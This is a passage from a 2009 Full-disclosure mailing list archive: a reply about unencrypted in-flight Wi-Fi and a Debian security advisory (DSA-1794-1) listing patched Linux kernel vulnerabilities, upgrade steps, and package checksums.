impacts. http://blog.zoller.lu/2009/04/case-for-av-bypassesevasions.html No reaction 27/04/2009 : Release of this limited advisory. [1] http://osvdb.org/vendor/1/Aladdin%20Knowledge%20Systems From blancher at cartel-securite.fr Thu May 7 11:44:37 2009 From: blancher at cartel-securite.fr (Cedric Blancher) Date: Thu, 07 May 2009 12:44:37 +0200 Subject: [Full-disclosure] [NETRAGARD SECURITY ADVISORY] [AirCell GoGo Inflight Internet -- No Encryption ][NETRAGARD-2009042] In-Reply-To: References: Message-ID: <1241693077.19566.31.camel@anduril.intranet.cartel-securite.net> Le mercredi 06 mai 2009 ? 21:02 -0400, Netragard Advisories a ?crit : > The GoGo Inflight Internet service does not encrypt wireless > connections between GoGo Inflight Internet users ("Users") and the > GoGo Inflight Internet Wireless Access Points ("WAP"). I totally agree that captive portal based wireless access is a poor security practice and have been advocating so[1] for quite some time. But do you plan to release an advisory every single time you find one somewhere ? The fact that it sits in a plane, hotel, airport, train does not make a big difference... And by the way, speaking specifically of planes, this general issue has already been raised something like 3 years ago[2]... [1] http://sid.rstack.org/pres/0608_BCS_OpenWireless.pdf [2] http://www.nmrc.org/pub/present/shmoocon-2006-sn.ppt -- http://sid.rstack.org/ PGP KeyID: 157E98EE FingerPrint: FA62226DA9E72FA8AECAA240008B480E157E98EE >> Hi! I'm your friendly neighbourhood signature virus. >> Copy me to your signature file and help me spread! From dannf at debian.org Thu May 7 00:23:13 2009 From: dannf at debian.org (dann frazier) Date: Wed, 6 May 2009 17:23:13 -0600 Subject: [Full-disclosure] [SECURITY] [DSA 1794-1] New Linux 2.6.18 packages fix several vulnerabilities Message-ID: <20090506232313.GF15333@ldl.fc.hp.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ---------------------------------------------------------------------- Debian Security Advisory DSA-1794-1 security at debian.org http://www.debian.org/security/ dann frazier May 6, 2009 http://www.debian.org/security/faq - ---------------------------------------------------------------------- Package : linux-2.6 Vulnerability : denial of service/privilege escalation/information leak Problem type : local/remote Debian-specific: no CVE Id(s) : CVE-2008-4307 CVE-2008-5395 CVE-2008-5701 CVE-2008-5702 CVE-2008-5713 CVE-2009-0028 CVE-2009-0029 CVE-2009-0031 CVE-2009-0065 CVE-2009-0322 CVE-2009-0675 CVE-2009-0676 CVE-2009-0834 CVE-2009-0859 CVE-2009-1192 CVE-2009-1265 CVE-2009-1336 CVE-2009-1337 CVE-2009-1439 Several vulnerabilities have been discovered in the Linux kernel that may lead to denial of service, privilege escalation, or information leak. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2008-4307 Bryn M. Reeves reported a denial of service in the NFS filesystem. Local users can trigger a kernel BUG() due to a race condition in the do_setlk function. CVE-2008-5395 Helge Deller discovered a denial of service condition that allows local users on PA-RISC to crash the system by attempting to unwind a stack containing userspace addresses. CVE-2008-5701 Vlad Malov reported an issue on 64-bit MIPS where a local user could cause a system crash by crafting a malicious binary which makes o32 syscalls with a number less than 4000. CVE-2008-5702 Zvonimir Rakamaric reported an off-by-one error in the ib700wdt watchdog driver which allows local users to cause a buffer underflow by making a specially crafted WDIOC_SETTIMEOUT ioctl call. CVE-2008-5713 Flavio Leitner discovered that a local user can cause a denial of service by generating large amounts of traffic on a large SMP system, resulting in soft lockups. CVE-2009-0028 Chris Evans discovered a situation in which a child process can send an arbitrary signal to its parent. CVE-2009-0029 Christian Borntraeger discovered an issue effecting the alpha, mips, powerpc, s390 and sparc64 architectures that allows local users to cause a denial of service or potentially gain elevated privileges. CVE-2009-0031 Vegard Nossum discovered a memory leak in the keyctl subsystem that allows local users to cause a denial of service by consuming all available kernel memory. CVE-2009-0065 Wei Yongjun discovered a memory overflow in the SCTP implementation that can be triggered by remote users, permitting remote code execution. CVE-2009-0322 Pavel Roskin provided a fix for an issue in the dell_rbu driver that allows a local user to cause a denial of service (oops) by reading 0 byts from a sysfs entry. CVE-2009-0675 Roel Kluin discovered inverted logic in the skfddi driver that permits local, unprivileged users to reset the driver statistics. CVE-2009-0676 Clement LECIGNE discovered a bug in the sock_getsockopt function that may result in leaking sensitive kernel memory. CVE-2009-0834 Roland McGrath discovered an issue on amd64 kernels that allows local users to circumvent system call audit configurations which filter based on the syscall numbers or argument details. CVE-2009-0859 Jiri Olsa discovered that a local user can cause a denial of service (system hang) using a SHM_INFO shmctl call on kernels compiled with CONFIG_SHMEM disabled. This issue does not affect prebuilt Debian kernels. CVE-2009-1192 Shaohua Li reported an issue in the AGP subsystem they may allow local users to read sensitive kernel memory due to a leak of uninitialized memory. CVE-2009-1265 Thomas Pollet reported an overflow in the af_rose implementation that allows remote attackers to retrieve uninitialized kernel memory that may contain sensitive data. CVE-2009-1336 Trond Myklebust reported an issue in the encode_lookup() function in the nfs server subsystem that allows local users to cause a denial of service (oops in encode_lookup()) by use of a long filename. CVE-2009-1337 Oleg Nesterov discovered an issue in the exit_notify function that allows local users to send an arbitrary signal to a process by running a program that modifies the exit_signal field and then uses an exec system call to launch a setuid application. CVE-2009-1439 Pavan Naregundi reported an issue in the CIFS filesystem code that allows remote users to overwrite memory via a long nativeFileSystem field in a Tree Connect response during mount. For the oldstable distribution (etch), this problem has been fixed in version 2.6.18.dfsg.1-24etch2. We recommend that you upgrade your linux-2.6, fai-kernels, and user-mode-linux packages. Note: Debian carefully tracks all known security issues across every linux kernel package in all releases under active security support. However, given the high frequency at which low-severity security issues are discovered in the kernel and the resource requirements of doing an update, updates for lower priority issues will normally not be released for all kernels at the same time. Rather, they will be released in a staggered or "leap-frog" fashion. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages The following matrix lists additional source packages that were rebuilt for compatability with or to take advantage of this update: Debian 4.0 (etch) fai-kernels 1.17+etch.24etch2 user-mode-linux 2.6.18-1um-2etch.24etch2 You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-24etch2.dsc Size/MD5 checksum: 5672 29972a87539a76fb5b146470f7b45c39 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-24etch1.diff.gz Size/MD5 checksum: 5536652 bf239ac0f2487929933aa0629de64ad7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-24etch1.dsc Size/MD5 checksum: 5672 b92a0d9b93d8ccf430734e0e3cc2fe87 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-24etch2.diff.gz Size/MD5 checksum: 5536709 4503d0ff5de1d53b5a672289ed5848f2 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1.orig.tar.gz Size/MD5 checksum: 52225460 6a1ab0948d6b5b453ea0fce0fcc29060 http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.24etch2.dsc Size/MD5 checksum: 740 b37bc8f75334963c7f0410c2296e77fb http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.24etch2.dsc Size/MD5 checksum: 892 68d98e1c77c46035a49ff30831b6dde9 http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.24etch2.tar.gz Size/MD5 checksum: 59036 682c3c14e9ef4e7696db50899a02f0b5 http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um.orig.tar.gz Size/MD5 checksum: 14435 4d10c30313e11a24621f7218c31f3582 http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.24etch2.diff.gz Size/MD5 checksum: 20663 9fe6e2b6513767676fb005a00cbb71f6 Architecture independent packages: http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.18_2.6.18.dfsg.1-24etch2_all.deb Size/MD5 checksum: 3592500 554e5252f25700683aaa6fd5761ef5d8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.18_2.6.18.dfsg.1-24etch2_all.deb Size/MD5 checksum: 58160 ae531496950d99a5b992570a1310c52e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.18_2.6.18.dfsg.1-24etch1_all.deb Size/MD5 checksum: 1085412 7e893ac7ae22985cb909b597c2f20e8c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.18_2.6.18.dfsg.1-24etch2_all.deb Size/MD5 checksum: 1820912 20119b39b0924aa9f3083450c7be8a85 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.18_2.6.18.dfsg.1-24etch2_all.deb Size/MD5 checksum: 41471594 a7fdc8dfc809e1fc276a7b51795fa8dc http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.18-6_2.6.18.dfsg.1-24etch1_all.deb Size/MD5 checksum: 3741774 84b89ad27a37d505a01d762b0747ff2c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.18_2.6.18.dfsg.1-24etch1_all.deb Size/MD5 checksum: 1820466 586a8e99417e2612b5f3d7369e2f94a9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.18_2.6.18.dfsg.1-24etch2_all.deb Size/MD5 checksum: 1085068 84281a805dae405a8468175d098b7601 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.18-6_2.6.18.dfsg.1-24etch2_all.deb Size/MD5 checksum: 3742014 7094d10edb64a9abec2edef65928839e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.18_2.6.18.dfsg.1-24etch1_all.deb Size/MD5 checksum: 41473576 38c60799be708c352ad9255add42ce3b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.18_2.6.18.dfsg.1-24etch1_all.deb Size/MD5 checksum: 58106 17a134e707c201d4a77f1e24a5e2769e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.18_2.6.18.dfsg.1-24etch1_all.deb Size/MD5 checksum: 3593118 8b74f3ec8d207f6c73572ab96c8c7395 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-24etch2_alpha.deb Size/MD5 checksum: 23473934 cbe30f310450bd925914daca5813749a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-generic_2.6.18.dfsg.1-24etch2_alpha.deb Size/MD5 checksum: 23492924 56433c869026af90edf2e676577f8897 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch1_alpha.deb Size/MD5 checksum: 57504 d0f363f4a0afac56901ba09147a7d9c9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-smp_2.6.18.dfsg.1-24etch2_alpha.deb Size/MD5 checksum: 270400 4946950b6f7a49f71ad402df8b56f727 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-smp_2.6.18.dfsg.1-24etch1_alpha.deb Size/MD5 checksum: 23751458 f515ef33090fbd04e9091fd404698bff http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-24etch2_alpha.deb Size/MD5 checksum: 270962 81e7337f510dfa7a573311942a2cb0c4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-generic_2.6.18.dfsg.1-24etch2_alpha.deb Size/MD5 checksum: 270810 9dde43cd10c0c76ce7f95ac1b3c48ee8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-24etch1_alpha.deb Size/MD5 checksum: 266996 ebdea056276a98aa168ec3f2a8d6fead http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-24etch2_alpha.deb Size/MD5 checksum: 23546372 d36aae75dfd73bb920e972ed35c51130 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch1_alpha.deb Size/MD5 checksum: 2977390 cb91566e47051b087818025c09433686 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-24etch1_alpha.deb Size/MD5 checksum: 266628 2af9e07d8fde05394c77490a56cace39 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-24etch1_alpha.deb Size/MD5 checksum: 23373164 6da0b86b5624545c57003ad4971a8600 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-smp_2.6.18.dfsg.1-24etch2_alpha.deb Size/MD5 checksum: 23849404 adc61b296e0148d80a36fd5c0cdc398e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-24etch1_alpha.deb Size/MD5 checksum: 3000958 6495ed75388c161aeea3fe3f234649c2 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-generic_2.6.18.dfsg.1-24etch1_alpha.deb Size/MD5 checksum: 266740 ece7d15d812a818fb941bf066c4cf107 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-smp_2.6.18.dfsg.1-24etch1_alpha.deb Size/MD5 checksum: 266510 c8fb5396900faa5fe29617e65b5d1340 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-alpha_2.6.18.dfsg.1-24etch2_alpha.deb Size/MD5 checksum: 57590 ce8fde6a4c56b444ffc4169e2c91d8c8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-24etch2_alpha.deb Size/MD5 checksum: 3057218 4079ceaeec683727d42aa4f0ff039467 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch2_alpha.deb Size/MD5 checksum: 57556 cfc864cc678ae266f537a5dbf913444d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-generic_2.6.18.dfsg.1-24etch1_alpha.deb Size/MD5 checksum: 23392094 bd229c2a4a5139282f8d56dc5d68db3d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-24etch1_alpha.deb Size/MD5 checksum: 23442694 2cbff8237013489493619b0bd7b5cb76 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-alpha_2.6.18.dfsg.1-24etch1_alpha.deb Size/MD5 checksum: 57538 eedeb00fdcab4f08f7bd0817972d4a39 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch2_alpha.deb Size/MD5 checksum: 3032298 5d8d424009fbb14d6a3d7747bc8f2db3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-24etch2_alpha.deb Size/MD5 checksum: 271360 1192112c8bad4d8249307d8a04719e0d amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-24etch1_amd64.deb Size/MD5 checksum: 16913766 b9bdf3f150eb989e56defbe20a3a54d8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-24etch2_amd64.deb Size/MD5 checksum: 3425782 0f9a61fbd2ddeacddc1a284022d20137 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-amd64_2.6.18.dfsg.1-24etch1_amd64.deb Size/MD5 checksum: 278846 c157673d8bb21376bc6efaf921a37c3d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-24etch1_amd64.deb Size/MD5 checksum: 3401184 f7f5fc7c991fc045aaadf74ff0eeb541 http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-24etch1_amd64.deb Size/MD5 checksum: 57496 27388370e87ce060dc4cc73f7f3564aa http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-amd64_2.6.18.dfsg.1-24etch2_amd64.deb Size/MD5 checksum: 57584 135a83295850c6cc297f250336b1e336 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-24etch1_amd64.deb Size/MD5 checksum: 279170 ec156e059a46e69c8bd5213c38b81246 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch1_amd64.deb Size/MD5 checksum: 57508 326c436e34be9324a7a7945a75b467f5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-24etch1_amd64.deb Size/MD5 checksum: 3256172 0f992a332d44244811d4f4667b946131 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-amd64_2.6.18.dfsg.1-24etch2_amd64.deb Size/MD5 checksum: 1656524 b8ae89e56a18ba4f5b2d44a95203969f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-24etch2_amd64.deb Size/MD5 checksum: 15369608 a45b9cd80f819696489589d03a4a5902 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-24etch2_amd64.deb Size/MD5 checksum: 1688680 e72bda68ed661e841903e71a5e7d0cdc http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-24etch1_amd64.deb Size/MD5 checksum: 16954524 f7267352268a0dfbccd1b05ebea495d3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-amd64_2.6.18.dfsg.1-24etch2_amd64.deb Size/MD5 checksum: 278736 0bd52f59a1a4976433fa81019916e953 http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-amd64_2.6.18.dfsg.1-24etch2_amd64.deb Size/MD5 checksum: 57530 37b533587e80bb97fdb1f9e273ef1c71 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-24etch2_amd64.deb Size/MD5 checksum: 281080 d652716ee66e0df8f1d2e11469bd5df5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-24etch1_amd64.deb Size/MD5 checksum: 1688674 61d7baeb6633c615efadffd0c7e9e7a0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-24etch1_amd64.deb Size/MD5 checksum: 15370384 24eba6725ba7ca279fb3987f5760d84b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-24etch1_amd64.deb Size/MD5 checksum: 282946 dff25979ef813b6d0737fd9de01388ae http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-amd64_2.6.18.dfsg.1-24etch2_amd64.deb Size/MD5 checksum: 15356656 f9d0a81e7c590e86dce1932b0cf0e2ff http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-24etch1_amd64.deb Size/MD5 checksum: 3425774 7d19e5bd73f7a3e765b3734233688f75 http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-amd64_2.6.18.dfsg.1-24etch1_amd64.deb Size/MD5 checksum: 57482 ddfbea54419ecf453651522b512f80ad http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-amd64_2.6.18.dfsg.1-24etch1_amd64.deb Size/MD5 checksum: 1656508 62c40ab1e29b39c3d0ef016deaf6a99a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-amd64_2.6.18.dfsg.1-24etch1_amd64.deb Size/MD5 checksum: 15358578 d6814d7b1e776206cf7a21badb3d151e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-24etch2_amd64.deb Size/MD5 checksum: 3400906 8b56ec266783cf0c6edf3dada99b05a1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-24etch2_amd64.deb Size/MD5 checksum: 3256076 9f704018576440522771ad44dd063745 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch2_amd64.deb Size/MD5 checksum: 57558 bdbc12099f897600cb0bb7866fcf12a6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-24etch2_amd64.deb Size/MD5 checksum: 279258 d8be131fc99940e033b4cc3c8039df24 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-24etch2_amd64.deb Size/MD5 checksum: 16911938 0d5e9e8c538a399c60fbe7f4ad38e239 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-24etch2_amd64.deb Size/MD5 checksum: 280758 8ddd0b369532cdcd44383587ba1040e8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch1_amd64.deb Size/MD5 checksum: 3231962 018b0dfeae9849cd0e28962a5a160048 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-24etch2_amd64.deb Size/MD5 checksum: 16955372 7d9c63e175ded010ba1f9a1057185ce2 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch2_amd64.deb Size/MD5 checksum: 3231978 f268273c6f5d8753b354919ef3d42ffb http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-24etch2_amd64.deb Size/MD5 checksum: 57546 f638083e1a12fe611dbfc0f9b9177ab5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-24etch1_amd64.deb Size/MD5 checksum: 282356 4f43f955762f7be01de440d3cbce7f40 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-amd64_2.6.18.dfsg.1-24etch1_amd64.deb Size/MD5 checksum: 57530 191a1e58eeb5ce701ce3605c8bfb13cf http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.24etch2_amd64.deb Size/MD5 checksum: 5962092 043c2c51d7aa93e1c4a7fd5b056f0e1d arm architecture (ARM) http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-rpc_2.6.18.dfsg.1-24etch2_arm.deb Size/MD5 checksum: 4592620 b5adc2cf2f3b4867bc5f005f5b485d72 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s3c2410_2.6.18.dfsg.1-24etch1_arm.deb Size/MD5 checksum: 208512 df79f26c934caf542346b25d6fbced6a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-arm_2.6.18.dfsg.1-24etch1_arm.deb Size/MD5 checksum: 57626 78c18b7635eff38eeed8c8cda07468a7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-ixp4xx_2.6.18.dfsg.1-24etch1_arm.deb Size/MD5 checksum: 8875798 2a577a02d18eab3e863afc8b3ae6fc93 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-footbridge_2.6.18.dfsg.1-24etch2_arm.deb Size/MD5 checksum: 7572928 45c6ecd8d912d0344c749eb161ac3d75 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-footbridge_2.6.18.dfsg.1-24etch1_arm.deb Size/MD5 checksum: 7572984 2a3ff014d8bf13a07de248be7bdefaeb http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-iop32x_2.6.18.dfsg.1-24etch1_arm.deb Size/MD5 checksum: 237092 aeeb9a78894e18986599035db9ee9efc http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s3c2410_2.6.18.dfsg.1-24etch2_arm.deb Size/MD5 checksum: 5016302 ee7a8fa2c4c33f56362d7b3c4a699313 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-ixp4xx_2.6.18.dfsg.1-24etch1_arm.deb Size/MD5 checksum: 241972 9ff3387ffd1b42b8384488986183b506 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-rpc_2.6.18.dfsg.1-24etch1_arm.deb Size/MD5 checksum: 4592706 f64c33fb5089be94d6e78c374ce086a9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch1_arm.deb Size/MD5 checksum: 3414642 49be1eaea5986030f55377333c5de8d9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-footbridge_2.6.18.dfsg.1-24etch2_arm.deb Size/MD5 checksum: 236406 3bad5f97981ff15e5552a623945aa41e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-footbridge_2.6.18.dfsg.1-24etch1_arm.deb Size/MD5 checksum: 236736 ebc67406b3c643f260d430dc12c2b7cf http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch1_arm.deb Size/MD5 checksum: 57580 ea065372d4e83d62536251e678c9c1ec http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-ixp4xx_2.6.18.dfsg.1-24etch2_arm.deb Size/MD5 checksum: 8875796 44d84e7aedbf25c6c10fd53edefc0ef0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-iop32x_2.6.18.dfsg.1-24etch2_arm.deb Size/MD5 checksum: 237190 20c7f8b97a2800172fab92a1dde0b215 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-ixp4xx_2.6.18.dfsg.1-24etch2_arm.deb Size/MD5 checksum: 241958 3a5e3dc633d9f5b5d889eb4c2742fa0a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch2_arm.deb Size/MD5 checksum: 57632 b1691bed70092c7478f4d0fd184b454b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-arm_2.6.18.dfsg.1-24etch2_arm.deb Size/MD5 checksum: 57676 06e20417a690515b1e34a03ec55ac6e9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-iop32x_2.6.18.dfsg.1-24etch2_arm.deb Size/MD5 checksum: 7928896 ab63947ead7c39d7b060a218eab378d9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-rpc_2.6.18.dfsg.1-24etch1_arm.deb Size/MD5 checksum: 202788 7c96813dac0c6ac27ccbe1ffe47744bf http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-iop32x_2.6.18.dfsg.1-24etch1_arm.deb Size/MD5 checksum: 7929028 6f7f1c14998cfe9e4591772d5be3787e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s3c2410_2.6.18.dfsg.1-24etch1_arm.deb Size/MD5 checksum: 5016402 ada8901a7d595c2fe9d00a841e872006 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-rpc_2.6.18.dfsg.1-24etch2_arm.deb Size/MD5 checksum: 202868 19a550d4763ce56d68a07222f4013b94 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s3c2410_2.6.18.dfsg.1-24etch2_arm.deb Size/MD5 checksum: 207396 3a7de120801525268476a7b6c22e8f84 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch2_arm.deb Size/MD5 checksum: 3414664 b68fdde7a80f3538a3c57b21a920bb16 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc_2.6.18.dfsg.1-24etch1_hppa.deb Size/MD5 checksum: 200234 a42025eb492c8cee39a4f9998e3b8582 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-24etch2_hppa.deb Size/MD5 checksum: 202374 68069764dc95a0cf3a025e9eb22a43ca http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc_2.6.18.dfsg.1-24etch2_hppa.deb Size/MD5 checksum: 200272 7b77d41811bcbef1e8033eb93dd67c03 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc-smp_2.6.18.dfsg.1-24etch1_hppa.deb Size/MD5 checksum: 11003742 1c6177557357e1f2a8aca8dede898aa8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch2_hppa.deb Size/MD5 checksum: 3026110 